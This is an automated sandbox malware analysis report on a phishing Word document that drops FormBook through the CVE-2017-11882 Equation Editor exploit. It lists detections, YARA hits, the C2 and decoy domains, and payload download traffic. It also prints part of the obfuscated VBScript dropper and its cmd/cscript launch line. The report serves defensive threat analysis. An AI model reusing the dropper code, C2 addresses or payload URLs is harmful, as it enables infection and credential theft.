Windows Analysis Report RFQ-CIF DT22.doc

Overview

General Information

Sample Name:	RFQ-CIF DT22.doc
Analysis ID:	532827
MD5:	66c72e808d6803f22fcd6ec419a6f039
SHA1:	0ac316f9fd8f6b3d8cfd05924f2c3704df112df7
SHA256:	0c5704edd32b5754f2caf5a45caef11e0fa1a9381c84b05f391b9b8d1c101a3a
Tags:	docFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document contains OLE streams which likely are hidden ActiveX objects

Sigma detected: Office product drops script at suspicious location

System process connects to network (likely due to code injection or exploit)

Document exploit detected (creates forbidden files)

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Sigma detected: Droppers Exploiting CVE-2017-11882

Maps a DLL or memory area into another process

Sigma detected: Suspicious Script Execution From Temp Folder

Document contains OLE streams with names of living off the land binaries

Creates processes via WMI

Found potential equation exploit (CVE-2017-11882)

Injects a PE file into a foreign processes

Tries to detect virtualization through RDTSC time measurements

Sigma detected: WScript or CScript Dropper

Sample uses process hollowing technique

Writes to foreign memory regions

Sigma detected: Microsoft Office Product Spawning Windows Shell

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Very long command line found

Microsoft Office drops suspicious files

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Found suspicious RTF objects

Antivirus or Machine Learning detection for unpacked file

Document has an unknown application name

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Potential document exploit detected (unknown TCP traffic)

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Internet Provider seen in connection with other malware

Stores large binary data to the registry

Found potential string decryption / allocating functions

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Document contains Microsoft Equation 3.0 OLE entries

Enables debug privileges

Document contains no OLE stream with summary information

Found inlined nop instructions (likely shell or obfuscated code)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Office Equation Editor has been started

Creates a window with clipboard capturing capabilities

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs HTTP gets)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp

Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Found malware configuration

Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.cybocross.com/t1st/"], "decoy": ["metaplanck.com", "blackieriver.com", "roswitha-johns.com", "medstarthealth.info", "coin-master.site", "jadeshomes.com", "institutowholelife.com", "cobodoro.com", "redsoxfever.com", "mybestrent.com", "avinashweddingplanner.com", "gzjiakangyy.com", "irectoryofmedicalschools.com", "sidelutagu.biz", "myapoison.com", "356792.com", "waplosik.online", "saverinstitue.com", "derva.link", "dddream-mip.com", "sicilyholidayhouses.com", "nakedpornpics.xyz", "votersfirstmissouri.com", "rebeccadehl.com", "dinaautoricemill.com", "jjzv.quest", "scoutmasterhub.online", "ecommercians.com", "laoniuys151.xyz", "berufsausbilderverband.com", "moonlive.win", "prootro.com", "themetaversebible.com", "huolm.com", "builderindoncaster.com", "getbookedva.com", "freemockup.store", "leeyo.net", "monicas.xyz", "seferihisarveteriner.net", "appsee.net", "truesarang.com", "rosscreekranch.com", "anunturibaneasa.xyz", "yesmeehoo.com", "b2bsaassystems.com", "greatmumbaiescorts.com", "arthropace.com", "francesca-anselmi.com", "seattleselects.com", "fairtravel.online", "chopy.house", "hakaiyue.com", "liberarmoden.com", "sobledis.com", "masononeill.xyz", "metechrobot.com", "cneje0.ltd", "arvoreknowledgelearning.com", "milan-sites.com", "zoedebets.online", "lavyx.com", "answercode.xyz", "foodcartgps.net"]}

Multi AV Scanner detection for submitted file

Source: RFQ-CIF DT22.doc	Virustotal: Detection: 25%			Perma Link
Source: RFQ-CIF DT22.doc	ReversingLabs: Detection: 15%

Yara detected FormBook

Source: Yara match	File source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY

Antivirus or Machine Learning detection for unpacked file

Source: 11.0.calc.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.0.calc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.calc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.0.calc.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Found potential equation exploit (CVE-2017-11882)

Source:

Static RTF information: Object: 1 Offset: 0001CF7Bh

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe			Jump to behavior

Document contains Microsoft Equation 3.0 OLE entries

Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr

Stream path '_1699974672/\x1CompObj' : ...........................F....Microsoft Equation

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: wntdll.pdb source: calc.exe, calc.exe, 0000000B.00000003.488729930.00000000007C0000.00000004.00000001.sdmp, calc.exe, 0000000B.00000002.542590602.0000000000CB0000.00000040.00000001.sdmp, calc.exe, 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, calc.exe, 0000000B.00000003.487607468.0000000000660000.00000004.00000001.sdmp, cscript.exe
Source:	Binary string: cscript.pdbN source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp
Source:	Binary string: cscript.pdb source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp, cscript.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: C:\Windows\explorer.exe	Network Connect: 47.241.96.113 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.foodcartgps.net
Source: C:\Windows\explorer.exe	Domain query: www.milan-sites.com

Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233

Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: WINWORD.EXE, 00000000.00000002.566514221.00000000078AE000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.open
Source: WINWORD.EXE, 00000000.00000002.566514221.00000000078AE000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: WINWORD.EXE, 00000000.00000002.561296439.0000000004440000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.490593119.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: cscript.exe, 00000006.00000002.414747436.0000000001FB0000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.510382629.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 0000000C.00000000.532738537.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.495179620.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.513635370.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: WINWORD.EXE, 00000000.00000002.561296439.0000000004440000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.490593119.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp2__
Source: explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.531077860.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.531077860.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.495179620.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.513635370.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 0000000C.00000000.510382629.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: global traffic	HTTP traffic detected: GET /attachments/915347845752705109/915799206072045578/m.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ HTTP/1.1Host: www.milan-sites.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165

Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, type: DROPPED	Matched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs

Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr	Stream path '_1699974670/\x1Ole10Native' : .!....Client.vbs.C:\Path\Client.vbs.........C:\Path\Client.vbs..!..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..sKeys0xCRC341414141 = Eval (E0xCRC341414141(")"""",emaNtpircS.tpircSW,emaNlluFtpircS.tpircSW(ecalper"))..GetObject (E0xCRC341414141("B0A85DF40C00-9BDA-0D11-0FC1-62CD539F:wen"))..F = lValue0xCRC341414141 + "\" + WScript.ScriptName..If sKeys0xCRC341414141 = lValue0xCRC341414141 Then..WScript.Quit()..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Else..End If........Function F0xCRC341414141()..Execute("TristateUseDefault0xCRC341414141= ArRAy (""eT"",""aE"",""rC"")")..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..F0xCRC341414141 = E0xCRC341414141( Join (TristateUseDefault0xCRC341414141,""))..End Function........Function G0xCRC341414141()..G0xCRC341414141 = "\toor\.\\!}etanosrepmi=leveL"..End Function........Function H0xCRC341414141()..H0xCRC341414141 = "noitanosrepmi{:stmgmniw"..End Function........Function I0xCRC341414141()..I0xCRC341414141 = E0xCRC341414141 ("putratSssecorP_23niW")..End Function........Function J0xCRC341414141()..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..J0xCRC341414141 = "hsre"..End Function........D0xCRC341414141()........Function E0xCRC341414141(str)..If Left(g_DumpDir,2) <> "\\" Then..DriveName = Left(g_DumpDir,1)..Else..strAux = Right(g_DumpDir, Len(g_DumpDir) - 2)..arrAux = Split(strAux, "\", -1) ..DriveName = "\\" & arrAux(0) & "\" & arrAux(1)..End If..Length = 8..objArgs = 5..If Length = objArgs Then..Else..GetStringArray = Len(str)..a = Left(str,1)..For i = 1 To GetStringArray..arrStrings = Eval("Lef" + "t(s" + "tr,i)")..If Len(arrStrings)> 1 Then..strSeparator = Right(arrStrings,1) & strTemp..strTemp = strSeparator ..End If..Next..E0xCRC341414141 = strTemp & a..End If..End Function........Sub B0xCRC341414141(CO0xCRC341414141)..Set ProductData0xCRC341414141 = GetObject (SPLevel0xCRC341414141 + "CiMv2")..Set ConvertToKey0xCRC341414141 = ProductData0xCRC341414141.Get (I0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Set KeyOffset0xCRC341414141 = ConvertToKey0xCRC341414141.SpawnInstance_..KeyOffset0xCRC341414141.ShowWindow = 0..Execute("SeT Data0xCRC341414141 = ProductData0xCRC341414141.Get (""WiN32_PrOceSs"")")..Set isWin80xCRC341414141 = Da
Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr	Stream path '_1699974672/Equation Native' : ..................\...[.............ZZCmD.exe /C cscript %tmp%\Client.vbs A..C................................................................................................................

Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041E814	11_2_0041E814
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00401030	11_2_00401030
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041DB34	11_2_0041DB34
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041EB8A	11_2_0041EB8A
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00402D90	11_2_00402D90
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00409E5B	11_2_00409E5B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00409E60	11_2_00409E60
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00402FB0	11_2_00402FB0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B4E0C6	11_2_00B4E0C6
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B7D005	11_2_00B7D005
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B6905A	11_2_00B6905A
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B53040	11_2_00B53040
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B4E2E9	11_2_00B4E2E9
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BF1238	11_2_00BF1238
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BF63BF	11_2_00BF63BF
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B763DB	11_2_00B763DB
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B4F3CF	11_2_00B4F3CF
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B52305	11_2_00B52305
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B9A37B	11_2_00B9A37B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B57353	11_2_00B57353
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B85485	11_2_00B85485
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B61489	11_2_00B61489
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B8D47D	11_2_00B8D47D
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B6C5F0	11_2_00B6C5F0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B5351F	11_2_00B5351F
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B96540	11_2_00B96540
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B54680	11_2_00B54680
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B5E6C1	11_2_00B5E6C1
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B9A634	11_2_00B9A634
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BF2622	11_2_00BF2622
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B5C7BC	11_2_00B5C7BC
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BD579A	11_2_00BD579A
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B857C3	11_2_00B857C3
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BEF8EE	11_2_00BEF8EE
